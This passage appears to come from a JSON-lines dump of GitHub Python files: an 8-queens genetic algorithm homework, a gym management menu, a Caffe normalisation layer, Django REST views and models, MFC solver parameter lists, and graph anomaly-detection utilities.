population\n        fittest_individual = get_fittest_individual(population, fitness_fn)\n\n        # If no production of significantly different offspring is happening, then we have a solution\n        if minimal_fitness <= fitness_fn(fittest_individual):\n            break\n    \n    print(\"Final generation {}:\".format(generation))\n    print_population(population, fitness_fn)\n\n    return fittest_individual\n\n\ndef print_population(population, fitness_fn):\n    '''Method that prints the population of a generation.'''\n    for individual in population:\n        fitness = fitness_fn(individual)\n        print(\"{} - fitness: {}\".format(individual, fitness))\n\n\ndef reproduce(mother, father):\n    '''\n    Reproduce two individuals with single-point crossover.\n    Return the two children individuals.\n    '''\n    offspring1, offspring2 = [],[]\n\n    # Random point to be used for crossover.\n    random_point = random.randint(0,num_of_queens-1)\n\n    # Starts from the left (=0) and goes to the right(=7)\n    bit = 0\n\n    # The first individual is copied up to the crossover point, then the second individual is copied from there on for the first offspring.\n    # The second individual is copied up to the crossover point, then the first individual is copied from there on for the second offspring.\n    while bit < random_point:\n        offspring1.append(mother[bit])\n        offspring2.append(father[bit])\n        bit = bit + 1\n    while bit <= num_of_queens-1:\n        offspring1.append(father[bit])\n        offspring2.append(mother[bit])\n        bit = bit + 1\n    \n    #return children\n    return [tuple(offspring1), tuple(offspring2)]\n\n\ndef mutate(individual):\n    '''\n    Mutate an individual by randomly assigning one of its bits.\n    Return the mutated individual.\n    '''\n    mutated_offspring = []\n\n    # Random bit to be mutated.\n    random_queen = random.randint(0,num_of_queens-1)\n\n    # Starts from the left (=0) and goes to the right(=7)\n    queen = 0\n\n    # Goes through the offspring and mutates it (changes the queen position indicated by random_queen)\n    while queen <= num_of_queens-1:\n        if queen == random_queen:\n            flag = 0\n            while flag == 0:\n                random_position = random.randint(0,num_of_queens-1)\n                if individual[queen] != random_position:\n                    flag = 1\n                    mutated_offspring.append(random_position)\n        else:\n            mutated_offspring.append(individual[queen])\n        \n        queen = queen + 1\n    \n    #return mutation\n    return tuple(mutated_offspring)\n\n\ndef random_selection(population, fitness_fn, fitness_ratio):\n    \"\"\"\n    Compute the fitness of each individual in the population according to fitness_fn and add up\n    the total. Then choose 2 from the sequence based on percentage contribution to\n    the total fitness of the population.\n    Return the selected variable which holds the two individuals that were chosen as\n    the mother and the father\n    \"\"\"\n\n    # Python sets are randomly ordered. Since we traverse the set twice, we\n    # want to do it in the same order. So let's convert it temporarily to a\n    # list.\n    ordered_population = list(population) \n\n    # Randomly select two parents - the parents must have different chromosomes\n    parents_found = 0\n    while parents_found == 0:\n        parents = random.choices(ordered_population,fitness_ratio,k=2)\n        if parents[0] != parents[1]:\n            parents_found = 1\n\n    #return selected\n    selected = [parents[0], parents[1]]\n    return selected \n\ndef fitness_function(individual):\n    '''\n    Computes the decimal value of the individual\n    Return the fitness level of the individual\n\n    Explanation:\n    enumerate(list) returns a list of pairs (position, element):\n\n    enumerate((4, 6, 2, 8)) -> [(0, 4), (1, 6), (2, 2), (3, 8)]\n\n    enumerate(reversed((1, 1, 0))) -> [(0, 0), (1, 1), (2, 1)]\n    '''\n\n    #return fitness\n    return (2**2) * individual[0] + (2**1) * individual[1] + (2**0) * individual[2]\n\n\ndef get_fittest_individual(iterable, func):\n    return max(iterable, key=func)\n\n\ndef get_initial_population(n, count):\n    '''\n    Randomly generate count individuals of length n\n    Note since its a set it disregards duplicate elements.\n    '''\n    return set([\n        tuple(random.randint(1, 8) for _ in range(n))\n        for _ in range(count)\n    ])\n\n\ndef main():\n\n    minimal_fitness = 0 # It's the minimum number of conflicting pairs, which indicates that no conflicts have taken place\n\n    # Population randomly created, as no set has been given.\n    initial_population = get_initial_population(8, 8)\n    print('Initial population:\\n',initial_population)\n\n    # Calling the GA algorithm and calculating the fitness score with method fitness_fn_positive from queens_fitness.py\n    fittest = genetic_algorithm(initial_population, fitness_fn_positive, minimal_fitness)\n    print('Fittest Individual: ' + str(fittest))\n\n\nif __name__ == '__main__':\n    main()","repo_name":"apatti01/Artificial-Intelligence","sub_path":"Lab 4/Homework/Homework.py","file_name":"Homework.py","file_ext":"py","file_size_in_byte":7661,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"37"} +{"seq_id":"27554171154","text":"import pdb\nfrom gymmanager import GymManager\nfrom customer import Customer \nfrom package import Package \n\n\ngymManager = GymManager()\n\nprint(\"\\n\")\nprint(\"******Amazing Gym Management System******\")\nprint(\"Hello Admin, Please select an option:\")\n\ndef menu():\n    print(\"1. Add Customer\")\n    print(\"2. Add Package\")\n    print(\"3. Show all packages\")\n    print(\"4. Show all customers\")\n    print(\"5. Find customer by name\")\n    print(\"6. Add Subscription\")\n    print(\"7. Add Payment\")\n    print(\"8. 
Show this menu again\")\n print()\n \n\nmenu()\nwhile True:\n try:\n selection = int(input(\"Enter Choice: \"))\n if selection == 1:\n name = str(input(\"Enter customer name: \"))\n phone_no = str(input(\"Enter customer phone no: \"))\n joined_date = str(input(\"Enter joined date:\"))\n customer = Customer(name, phone_no, joined_date)\n gymManager.add_customer(customer)\n elif selection == 2:\n name = input(\"Enter Package Name- \")\n facilities = input(\"Enter Facilities- \")\n cost = input(\"Enter cost- \")\n package = Package(name,facilities,cost)\n gymManager.add_package(package)\n\n elif selection == 3:\n for pkgId in gymManager.packages.keys():\n package = gymManager.packages[pkgId]\n packageId = pkgId\n package_names = package.get_package_name\n facilities = package.get_facilities\n cost = package.get_cost\n print(str(packageId) + \"\\t\" + package_names + \"\\t\" \\\n + facilities + \"\\t\" + '$'+ str(cost) )\n\n elif selection == 4:\n for cId in gymManager.customers.keys():\n customer = gymManager.customers[cId]\n customer_id = cId\n print(customer_id)\n customer_names = customer.get_name\n print(str(customer_id) + '\\t' + customer_names) \n \n\n\n\n except ValueError as e:\n print(\"Wrong Entry. Enter a number\")","repo_name":"eustone/gymsystem","sub_path":"main.py","file_name":"main.py","file_ext":"py","file_size_in_byte":2045,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"37"} +{"seq_id":"5576596940","text":"import caffe\nimport numpy as np\n\nclass NormLayer(caffe.Layer):\n def setup(self, bottom, top):\n if len(bottom) != 1:\n raise Exception(\"Input size error.\")\n \n params = eval(self.param_str)\n self.src_type = params['src_type']\n self.dst_type = params['dst_type']\n \n def reshape(self, bottom, top):\n self.src = np.cast['float32'](bottom[0].data)\n top[0].reshape(*self.src.shape)\n\n def forward(self, bottom, top):\n if self.src_type == 'uess': # [0, 255]\n if self.dst_type == 'udec': # [0, 1]\n dst = self.src / 255.0\n elif self.dst_type == 'dec': # [-1, 1]\n dst = ((self.src / 255.0) * 2.0) - 1.0\n else:\n raise Exception(\"Input type error1.\")\n elif self.src_type == 'udec': # [0, 1]\n if self.dst_type == 'uess': # [0, 255]\n dst = self.src * 255.0\n elif self.dst_type == 'dec': # [-1, 1]\n dst = (self.src * 2.0) - 1.0\n else:\n raise Exception(\"Input type error2.\")\n elif self.src_type == 'dec': # [-1, 1]\n if self.dst_type == 'uess': # [0, 255]\n dst = ((self.src / 2.0) + 0.5) * 255.0\n elif self.dst_type == 'udec': # [0, 1]\n dst = (self.src / 2.0) + 0.5\n else:\n raise Exception(\"Input type error3.\")\n else:\n raise Exception(\"Input type error0.\")\n\n top[0].data[...] 
= dst\n\n def backward(self, bottom, top):\n pass","repo_name":"JunhyeongBak/Caffe_Light_Field","sub_path":"layers/norm_layer.py","file_name":"norm_layer.py","file_ext":"py","file_size_in_byte":1568,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"37"} +{"seq_id":"24769523506","text":"import numpy as np\nsize = int(input(\"Enter the size of array::\"))\narr = np.array([input(\"Enter elements::\") for _ in range(size)])\nnp.set_printoptions(threshold=np.inf)\n# result = arr.tolist()\nresult1 = '['+ ', '.join(arr)+']'\nprint(result1)\n\ndef partition(array):\n i,j= 1,len(array) -1\n x=array[0]\n while i<=j:\n if array[i]<=x:\n i+=1\n elif array[j]>x:\n j-=1\n else:\n array[i],array[j]= array[j],array[i]\n i+=1\n j-=1\n else:\n array[0],array[j]= array[j],array[0]\n return array \n# x = int(input(\"Enter x::\"))\n# if str(x) in result:\n# partition(arr, x)\n# else:\n# print(\"Number not in array\"dwdwdw)\n# arr = [6,9,4,5,1,7,3,10]\n# array2 = ', '.join(arr)\narray2 =partition(arr)\nresult2 = '['+ ', '.join(array2)+']'\nprint(result2)\n","repo_name":"ypradhan222/mtech_code","sub_path":"ALgorithms/partition.py","file_name":"partition.py","file_ext":"py","file_size_in_byte":828,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"37"} +{"seq_id":"20928983677","text":"from ..util import common\n\n\nPRE_PROCESS = ['case_dir', 'old_grid', 'old_ic', 't_step_old', 'm', 'n', 'p',\n 'cyl_coord', 'model_eqns', 'num_fluids', 'adv_alphan', 'mpp_lim',\n 'weno_order', 'precision', 'parallel_io', 'perturb_flow',\n 'perturb_flow_fluid', 'perturb_sph', 'perturb_sph_fluid',\n 'fluid_rho', 'hypoelasticity', 'num_patches', 'Ca', 'Web',\n 'Re_inv', 'pref', 'rhoref', 'bubbles' , 'polytropic',\n 'polydisperse', 'poly_sigma', 'thermal', 'nb', 'R0ref', 'qbmm',\n 'dist_type', 'R0_type', 'sigR', 'sigV', 'rhoRV']\n\nfor cmp in [\"x\", \"y\", \"z\"]:\n for prepend in [\"domain%beg\", \"domain%end\", \"a\", \"b\"]:\n PRE_PROCESS.append(f\"{cmp}_{prepend}\")\n\n for append in [\"stretch\", \"a\", \"loops\"]:\n PRE_PROCESS.append(f\"{append}_{cmp}\")\n\n PRE_PROCESS.append(f\"bc_{cmp}%beg\")\n PRE_PROCESS.append(f\"bc_{cmp}%end\")\n\nfor f_id in range(1, 10+1):\n PRE_PROCESS.append(f'fluid_rho({f_id})')\n\n for attribute in [\"gamma\", \"pi_inf\", \"mul0\", \"ss\", \"pv\", \"gamma_v\", \"M_v\",\n \"mu_v\", \"k_v\", \"G\"]:\n PRE_PROCESS.append(f\"fluid_pp({f_id})%{attribute}\")\n\nfor p_id in range(1, 10+1):\n for attribute in [\"geometry\", \"radius\", \"radii\", \"epsilon\", \"beta\",\n \"normal\", \"smoothen\", \"smooth_patch_id\", \"alpha_rho\",\n \"smooth_coeff\", \"rho\", \"vel\", \"pres\", \"alpha\", \"gamma\",\n \"pi_inf\", \"r0\", \"v0\", \"p0\", \"m0\"]:\n PRE_PROCESS.append(f\"patch_icpp({p_id})%{attribute}\")\n\n for cmp_id, cmp in enumerate([\"x\", \"y\", \"z\"]):\n cmp_id += 1\n PRE_PROCESS.append(f'patch_icpp({p_id})%{cmp}_centroid')\n PRE_PROCESS.append(f'patch_icpp({p_id})%length_{cmp}')\n\n for append in [\"radii\", \"normal\", \"vel\"]:\n PRE_PROCESS.append(f'patch_icpp({p_id})%{append}({cmp_id})')\n\n for arho_id in range(1, 10+1):\n PRE_PROCESS.append(f'patch_icpp({p_id})%alpha({arho_id})')\n PRE_PROCESS.append(f'patch_icpp({p_id})%alpha_rho({arho_id})')\n\n for taue_id in range(1, 6+1):\n PRE_PROCESS.append(f'patch_icpp({p_id})%tau_e({taue_id})')\n\n if p_id >= 2:\n PRE_PROCESS.append(f'patch_icpp({p_id})%alter_patch')\n\n for alter_id in range(1, p_id):\n 
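# presumably one flag per earlier patch, controlling whether patch p_id may alter/overwrite patch alter_id\n            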
PRE_PROCESS.append(f'patch_icpp({p_id})%alter_patch({alter_id})')\n\n\nSIMULATION = ['case_dir', 'run_time_info', 't_step_old', 't_tol', 'debug', 'm',\n 'n', 'p', 'cyl_coord', 'dt', 't_step_start', 't_step_stop',\n 't_step_save', 'model_eqns', 'num_fluids', 'adv_alphan',\n 'mpp_lim', 'time_stepper', 'weno_vars', 'weno_order', 'weno_eps',\n 'char_decomp', 'mapped_weno', 'mp_weno', 'weno_avg',\n 'weno_Re_flux', 'riemann_solver', 'wave_speeds', 'avg_state',\n 'commute_err', 'split_err', 'alt_crv', 'alt_soundspeed',\n 'regularization', 'reg_eps', 'null_weights', 'mixture_err',\n 'tvd_riemann_flux', 'tvd_rhs_flux', 'tvd_wave_speeds', 'flux_lim',\n 'We_riemann_flux', 'We_rhs_flux', 'We_src', 'We_wave_speeds',\n 'lsq_deriv', 'parallel_io', 'precision', 'hypoelasticity',\n 'fd_order' , 'com_wrt', 'num_probes', 'probe_wrt', 'cb_wrt',\n 'threshold_mf', 'moment_order', 'pref', 'rhoref', 'polydisperse',\n 'poly_sigma', 'bubbles', 'bubble_model', 'polytropic', 'thermal',\n 'R0ref', 'Ca', 'Web', 'Re_inv', 'nb', 'Monopole', 'num_mono',\n 'qbmm', 'R0_type', 'integral_wrt', 'num_integrals',\n \"cu_mpi\"]\n\nfor cmp in [\"x\", \"y\", \"z\"]:\n SIMULATION.append(f'bc_{cmp}%beg')\n SIMULATION.append(f'bc_{cmp}%end')\n\nfor wrt_id in range(1,10+1):\n SIMULATION.append(f'com_wrt({wrt_id})')\n SIMULATION.append(f'cb_wrt({wrt_id})')\n\n for cmp in [\"x\", \"y\", \"z\"]:\n SIMULATION.append(f'probe_wrt({wrt_id})%{cmp}')\n\nfor probe_id in range(1,3+1):\n for cmp in [\"x\", \"y\", \"z\"]:\n SIMULATION.append(f'probe({probe_id})%{cmp}')\n\nfor mf_id in range(1,5+1):\n SIMULATION.append(f'threshold_mf({mf_id})')\n\nfor order_id in range(1,5+1):\n SIMULATION.append(f'moment_order({order_id})')\n\nfor f_id in range(1,10+1):\n for attribute in [\"gamma\", \"pi_inf\", \"mul0\", \"ss\", \"pv\", \"gamma_v\", \"M_v\",\n \"mu_v\", \"k_v\", \"G\"]:\n SIMULATION.append(f\"fluid_pp({f_id})%{attribute}\")\n\n for re_id in [1, 2]:\n SIMULATION.append(f\"fluid_pp({f_id})%Re({re_id})\")\n\n for mono_id in range(1,4+1):\n for attribute in [\"mag\", \"length\", \"dir\", \"npulse\", \"pulse\", \"support\",\n \"delay\"]:\n SIMULATION.append(f\"Mono({mono_id})%{attribute}\")\n\n for cmp_id in range(1,3+1):\n SIMULATION.append(f\"Mono({mono_id})%loc({cmp_id})\")\n\n for int_id in range(1,5+1):\n for cmp in [\"x\", \"y\", \"z\"]:\n SIMULATION.append(f\"integral({int_id})%{cmp}min\")\n SIMULATION.append(f\"integral({int_id})%{cmp}max\")\n\n\nPOST_PROCESS = ['case_dir', 'cyl_coord', 'm', 'n', 'p', 't_step_start',\n 't_step_stop', 't_step_save', 'model_eqns', 'num_fluids',\n 'adv_alphan', 'mpp_lim', 'weno_order', 'alt_soundspeed',\n 'mixture_err', 'parallel_io', 'hypoelasticity',\n 'polydisperse', 'poly_sigma', 'polytropic', 'thermal',\n 'pref', 'Ca', 'Web', 'Re_inv', 'rhoref', 'bubbles',\n 'R0ref', 'nb', 'format', 'precision', 'coarsen_silo',\n 'fourier_decomp', 'fourier_modes%beg',\n 'fourier_modes%end', 'alpha_rho_wrt', 'rho_wrt',\n 'mom_wrt', 'vel_wrt', 'flux_lim', 'flux_wrt', 'E_wrt',\n 'pres_wrt', 'alpha_wrt', 'kappa_wrt', 'gamma_wrt',\n 'heat_ratio_wrt', 'pi_inf_wrt', 'pres_inf_wrt',\n 'cons_vars_wrt', 'prim_vars_wrt', 'c_wrt', 'omega_wrt',\n 'schlieren_wrt', 'schlieren_alpha', 'fd_order']\n\nfor cmp_id in range(1,3+1):\n cmp = [\"x\", \"y\", \"z\"][cmp_id-1]\n\n POST_PROCESS.append(f'bc_{cmp}%beg')\n POST_PROCESS.append(f'bc_{cmp}%end')\n\n for attribute in [\"mom_wrt\", \"vel_wrt\", \"flux_wrt\", \"omega_wrt\"]:\n POST_PROCESS.append(f'{attribute}({cmp_id})')\n\nfor fl_id in range(1,10+1):\n for append in [\"schlieren_alpha\", 
\"alpha_rho_wrt\", \"alpha_wrt\", \"kappa_wrt\"]:\n POST_PROCESS.append(f'{append}({fl_id})')\n\n for attribute in [\"gamma\", \"pi_inf\", \"ss\", \"pv\", \"gamma_v\", \"M_v\", \"mu_v\", \"k_v\", \"G\", \"mul0\"]:\n POST_PROCESS.append(f\"fluid_pp({fl_id})%{attribute}\")\n\n\nCASE_OPTIMIZATION = [ \"nb\", \"weno_order\" ]\n\n\ndef get_input_dict_keys(target_name: str, args: list) -> list:\n result = None\n if target_name == \"pre_process\": result = PRE_PROCESS.copy()\n if target_name == \"simulation\": result = SIMULATION.copy()\n if target_name == \"post_process\": result = POST_PROCESS.copy()\n\n if result == None:\n raise common.MFCException(f\"[INPUT DICTS] Target {target_name} doesn't have an input dict.\")\n\n if not args[\"case_optimization\"] or target_name != \"simulation\":\n return result\n \n return [ x for x in result if x not in CASE_OPTIMIZATION ]\n","repo_name":"MFlowCode/MFC-develop","sub_path":"toolchain/mfc/run/case_dicts.py","file_name":"case_dicts.py","file_ext":"py","file_size_in_byte":7132,"program_lang":"python","lang":"en","doc_type":"code","stars":3,"dataset":"github-code","pt":"37"} +{"seq_id":"19299812166","text":"from core.models import *\nfrom core.api.serializers import *\nfrom rest_framework.response import Response\nfrom rest_framework.decorators import api_view\nfrom rest_framework import viewsets, status\n\nfrom rest_framework.authentication import TokenAuthentication\n\n\n@api_view(['GET', 'POST'])\ndef state_api_view(request):\n if request.method == 'GET':\n state = State.objects.all()\n stateSerializers = StateSerializers(state, many=True)\n return Response(stateSerializers.data, status.HTTP_200_OK)\n\n elif request.method == 'POST':\n stateSerializers = StateSerializers(data = request.data)\n if stateSerializers.is_valid():\n stateSerializers.save()\n return Response(stateSerializers.data, status.HTTP_201_CREATED)\n return Response(stateSerializers.errors, status.HTTP_400_BAD_REQUEST)\n\n@api_view(['GET', 'POST'])\n\ndef case_api_view(request):\n if request.method == 'GET':\n case = Case.objects.all()\n caseSerializers = CaseSerializers(case, many=True)\n return Response(caseSerializers.data, status.HTTP_200_OK)\n\n elif request.method == 'POST':\n caseSerializers = CaseSerializers(data = request.data)\n if caseSerializers.is_valid():\n caseSerializers.save()\n return Response(caseSerializers.data, status.HTTP_201_CREATED)\n return Response(caseSerializers.errors, status.HTTP_400_BAD_REQUEST)\n\n@api_view(['GET', 'POST'])\ndef portafolio_api_view(request):\n if request.method == 'GET':\n portafolio = MediationPortafolio.objects.all()\n portafolioSerializers = PortafolioSerializers(portafolio, many=True)\n return Response(portafolioSerializers.data, status.HTTP_200_OK)\n\n elif request.method == 'POST':\n portafolio = PortafolioSerializers(data = request.data)\n if portafolio.is_valid():\n portafolio.save()\n return Response(portafolio.data, status.HTTP_201_CREATED)\n return Response(portafolio.errors, status.HTTP_400_BAD_REQUEST)\n\n@api_view(['GET', 'POST'])\ndef sessions_api_view(request):\n if request.method == 'GET':\n sessions = MediationSessions.objects.all()\n sessionsSerializers = SessionsSerializers(sessions, many=True)\n return Response(sessionsSerializers.data, status.HTTP_200_OK)\n\n elif request.method == 'POST':\n sessions = SessionsSerializers(data = request.data)\n if sessions.is_valid():\n sessions.save()\n return Response(sessions.data, status.HTTP_201_CREATED)\n return Response(sessions.errors, 
status.HTTP_400_BAD_REQUEST)\n\n@api_view(['GET', 'PUT', 'DELETE'])\ndef state_detail_api_view(request, pk=None):\n state = State.objects.filter(id = pk).first()\n if state:\n if request.method == 'GET':\n stateSerializers = StateSerializers(state)\n return Response(stateSerializers.data, status.HTTP_200_OK)\n\n elif request.method == 'PUT':\n stateSerializers = StateSerializers(state, data = request.data)\n if stateSerializers.is_valid():\n stateSerializers.save()\n return Response(stateSerializers.data)\n return Response(stateSerializers.errors, status.HTTP_400_BAD_REQUEST)\n elif request.method == 'DELETE':\n state.delete()\n return Response('Eliminado')\n\n return Response({'message:':'No se a encontrado un estado con estos datos'}, status = status.HTTP_400_BAD_REQUEST)\n@api_view(['GET', 'PUT', 'DELETE'])\ndef case_detail_api_view(request, pk=None):\n case = Case.objects.filter(id = pk).first()\n if case:\n if request.method == 'GET':\n caseSerializers = CaseSerializers(case)\n return Response(caseSerializers.data, status.HTTP_200_OK)\n\n elif request.method == 'PUT':\n caseSerializers = CaseSerializers(case, data = request.data)\n if caseSerializers.is_valid():\n caseSerializers.save()\n return Response(caseSerializers.data)\n return Response(caseSerializers.errors, status.HTTP_400_BAD_REQUEST)\n elif request.method == 'DELETE':\n case.delete()\n return Response('Eliminado')\n\n return Response({'message:':'No se a encontrado un caso con estos datos'})\n\n@api_view(['GET', 'PUT', 'DELETE'])\ndef portfolio_detail_api_view(request, pk=None):\n portafolio = MediationPortafolio.objects.filter(id = pk).first()\n if portafolio:\n if request.method == 'GET':\n portafolioSerializers = PortafolioSerializers(portafolio)\n return Response(portafolioSerializers.data, status.HTTP_200_OK)\n\n elif request.method == 'PUT':\n portafolioSerializers = PortafolioSerializers(portafolio, data = request.data)\n if portafolioSerializers.is_valid():\n portafolioSerializers.save()\n return Response(portafolioSerializers.data)\n return Response(portafolioSerializers.errors, status.HTTP_400_BAD_REQUEST)\n elif request.method == 'DELETE':\n portafolio.delete()\n return Response('Eliminado')\n\n return Response({'message:':'No se a encontrado un portfolio con estos datos'}, status.HTTP_400_BAD_REQUEST)\n\n@api_view(['GET', 'PUT', 'DELETE'])\ndef session_detail_api_view(request, pk=None):\n session = MediationSessions.objects.filter(id = pk).first()\n if session:\n if request.method == 'GET':\n sessionSerializers = SessionsSerializers(session)\n return Response(sessionSerializers.data, status.HTTP_200_OK)\n\n elif request.method == 'PUT':\n sessionSerializers = SessionsSerializers(session, data = request.data)\n if sessionSerializers.is_valid():\n sessionSerializers.save()\n return Response(sessionSerializers.data)\n return Response(sessionSerializers.errors, status.HTTP_400_BAD_REQUEST)\n elif request.method == 'DELETE':\n session.delete()\n return Response('Eliminado')\n\n return Response({'message:':'No se a encontrado una Session con estos datos'})\n","repo_name":"FranAmeri99/Centro_Mediacion_API","sub_path":"app/core/api/api.py","file_name":"api.py","file_ext":"py","file_size_in_byte":6127,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"37"} +{"seq_id":"40131212424","text":"from django.shortcuts import render\nfrom allauth.account.admin import EmailAddress\nfrom .models import Commodity\nfrom django.core.paginator import Paginator\n\n\ndef index(request):\n if 
request.method == \"GET\":\n        current_user, verified = get_member_data(request)\n        return render(request, 'index.html', locals())\n\n\ndef listing(request):\n    if request.method == \"GET\":\n        current_user, verified = get_member_data(request)\n        products = Commodity.objects.all()\n        paginator = Paginator(products, 9)\n        page_number = request.GET.get('page')\n        page_obj = paginator.get_page(page_number)\n        return render(request, 'listing.html', locals())\n\n\n# -------------------- member authorization check ------------------\ndef get_member_data(request):\n    try:\n        current_user = request.user\n        verified = EmailAddress.objects.filter(user=current_user).values()[0]\n        verified = verified[\"verified\"]\n        # print(f'Current user: {request.user}')\n        # print(f'Current user email verified: {verified}')\n    except Exception:\n        verified = False\n    return current_user, verified\n","repo_name":"appletime81/DjangoBookStore","sub_path":"cart/views.py","file_name":"views.py","file_ext":"py","file_size_in_byte":1117,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"37"} +{"seq_id":"38447076059","text":"from mpl_toolkits.basemap import Basemap\nimport matplotlib.pyplot as plt\n\nmap = Basemap(projection='ortho', \n              lat_0=0, lon_0=0)\n\nmap.drawmapboundary(fill_color='aqua')\nmap.fillcontinents(color='#cc9955',lake_color='aqua')\nmap.drawcoastlines()\n\nlon = 3.4\nlat = 3.4\n\nx, y = map(lon, lat)\n\nplt.text(x, y, 'Lagos',fontsize=12,fontweight='bold',\n         ha='left',va='bottom',color='k')\n\nlon = 2.1\nlat = 41.\n\nx, y = map(lon, lat)\n\nplt.text(x, y, 'Barcelona',fontsize=12,fontweight='bold',\n         ha='left',va='center',color='k',\n         bbox=dict(facecolor='b', alpha=0.2))\nplt.show()","repo_name":"rveciana/BasemapTutorial","sub_path":"code_examples/plotting_data/text.py","file_name":"text.py","file_ext":"py","file_size_in_byte":629,"program_lang":"python","lang":"en","doc_type":"code","stars":99,"dataset":"github-code","pt":"37"} +{"seq_id":"17658123904","text":"from django.db import models\nfrom django.contrib.auth.models import AbstractUser\nimport uuid\n\n\n# Create your models here.\n\nclass User(AbstractUser):\n    email = models.EmailField(unique=True, null=True)\n\n    id = models.UUIDField(default=uuid.uuid4, unique = True, \n                          primary_key=True, editable=False)\n\n    USERNAME_FIELD = 'email'\n    REQUIRED_FIELDS = ['username']\n\nclass Event(models.Model):\n    name = models.CharField(max_length=100)\n    description = models.TextField(null=True, blank=True)\n    CATEGORY_CHOICES = [\n        ('music', 'Music'),\n        ('health', 'Health'),\n        ('tech', 'Tech'),\n        ('hobbies', 'Hobbies'),\n        ('business', 'Business'),\n        ('sports', 'Sports'),\n        ('food', 'Food and Eat'),\n        ('arts', 'Visual Arts'),\n    ]\n    category = models.CharField(max_length=10, choices=CATEGORY_CHOICES, default='Music')\n    location = models.CharField(max_length=100)\n    price = models.DecimalField(max_digits=6, decimal_places=2, default='0.00')\n    date_time = models.DateTimeField()\n    featured_image = models.ImageField(blank=True, null=True, default=\"/images/default.jpg\")\n    creator = models.ForeignKey(User, on_delete=models.CASCADE, related_name='events_created')\n    attendees = models.ManyToManyField(User, through='Registration', related_name='events_attending')\n    id = models.UUIDField(default=uuid.uuid4, unique = True, \n                          primary_key=True, editable=False)\n\n    \n    def __str__(self):\n        return self.name\n\n\nclass Registration(models.Model):\n    user = models.ForeignKey(User, on_delete=models.CASCADE)\n    event = models.ForeignKey(Event, on_delete=models.CASCADE)\n    name = 
models.CharField(max_length=100)\n email = models.EmailField(null=True)\n id = models.UUIDField(default=uuid.uuid4, unique = True, \n primary_key=True, editable=False)\n\n class Meta:\n unique_together = ('user', 'event')\n\n #Function to know attendees that registered\n def __str__(self):\n return f\"{self.name} ({self.email}) registered for {self.event.name}\"\n\n","repo_name":"amanlikemurphy/Cloud-based-Event-Management-Project","sub_path":"base/models.py","file_name":"models.py","file_ext":"py","file_size_in_byte":2101,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"37"} +{"seq_id":"14554444878","text":"import numpy as np\r\nimport scipy.sparse as sp\r\nimport torch\r\nimport scipy.io as sio\r\nimport random\r\nimport pandas as pd\r\ndef load_anomaly_detection_dataset(dataset, datadir,sample_density,sample_size):\r\n\r\n\tdata_mat = sio.loadmat(f'{datadir}/{dataset}.mat')\r\n\tadj = data_mat['Network']\r\n\tfeat = data_mat['Attributes'].astype(float)\r\n\tLabel =pd.DataFrame(data_mat['Label'])\r\n\tnormal=np.empty(0)\r\n\tfor i in range(1,Label.size):\r\n\t\tnormal=np.append(normal,i)\r\n\tsuspicious = np.empty(0)\r\n\tfor i in range(0,int(sample_density*sample_size)):\r\n\t\tsuspicious_a=Label.index[Label[0]==1].tolist() \r\n\t\tr=random.randrange(len(suspicious_a))\r\n\t\tsuspicious=np.append(suspicious,suspicious_a[r])\r\n\t\tnormal=np.delete(normal,np.argwhere(normal==suspicious_a[r]))\r\n\tfor i in range(0,int(sample_size-sample_density*sample_size)):\r\n\t\tsuspicious_n=Label.index[Label[0]==0].tolist() \r\n\t\tr=random.randrange(len(suspicious_n))\r\n\t\tsuspicious=np.append(suspicious,suspicious_n[r])\r\n\t\tnormal=np.delete(normal,np.argwhere(normal==suspicious_n[r]))\r\n\t# suspicious = data_mat['Suspicious']\r\n\t# normal = data_mat['Normal']\r\n\t#truth= np.take_along_axis(truth,suspicious.astype(int),axis=0)\r\n\t# truth = truth.flatten()\r\n\r\n\tadj_norm = normalize_adj(adj + sp.eye(adj.shape[0]))\r\n\tadj_norm = adj_norm.toarray()\r\n\tadj = adj + sp.eye(adj.shape[0])\r\n\tadj=adj\r\n\t# print(feat)\r\n\t#feat = feat/feat.max(axis=0)\r\n\t# print(feat)\r\n\treturn adj_norm, feat, np.array(Label[0]), adj, normal, suspicious\r\n\r\ndef normalize_adj(adj):\r\n \"\"\"Symmetrically normalize adjacency matrix.\"\"\"\r\n adj = sp.coo_matrix(adj)\r\n rowsum = np.array(adj.sum(1))\r\n d_inv_sqrt = np.power(rowsum, -0.5).flatten()\r\n d_inv_sqrt[np.isinf(d_inv_sqrt)] = 0.\r\n d_mat_inv_sqrt = sp.diags(d_inv_sqrt)\r\n return adj.dot(d_mat_inv_sqrt).transpose().dot(d_mat_inv_sqrt).tocoo()","repo_name":"GILESBastien/Suspicious_EGC","sub_path":"utils.py","file_name":"utils.py","file_ext":"py","file_size_in_byte":1808,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"37"} +{"seq_id":"21132167443","text":"from ..BaseMesh import BaseMesh\nimport numpy as np\n\n\nclass CurveRectangularMesh(BaseMesh):\n\n def __init__(self, lx: float, nx: int, amp_x: float, ly: float, ny: int, amp_y: float, lz: float, nz: int, amp_z: float):\n super().__init__()\n\n self._lx = lx\n self._ly = ly\n self._lz = lz\n\n self._nx = nx\n self._ny = ny\n self._nz = nz\n\n self._amp_x = amp_x\n self._amp_y = amp_y\n self._amp_z = amp_z\n\n self._create_grid()\n\n def _create_grid(self):\n\n self._node_number = self._nx*self._ny*self._nz\n self._mesh_size = (self._nx, self._ny, self._nz)\n\n x = np.linspace(0, self._lx, self._nx)\n y = np.linspace(0, self._ly, self._ny)\n z = np.linspace(0, self._lz, self._nz)\n\n self._x, 
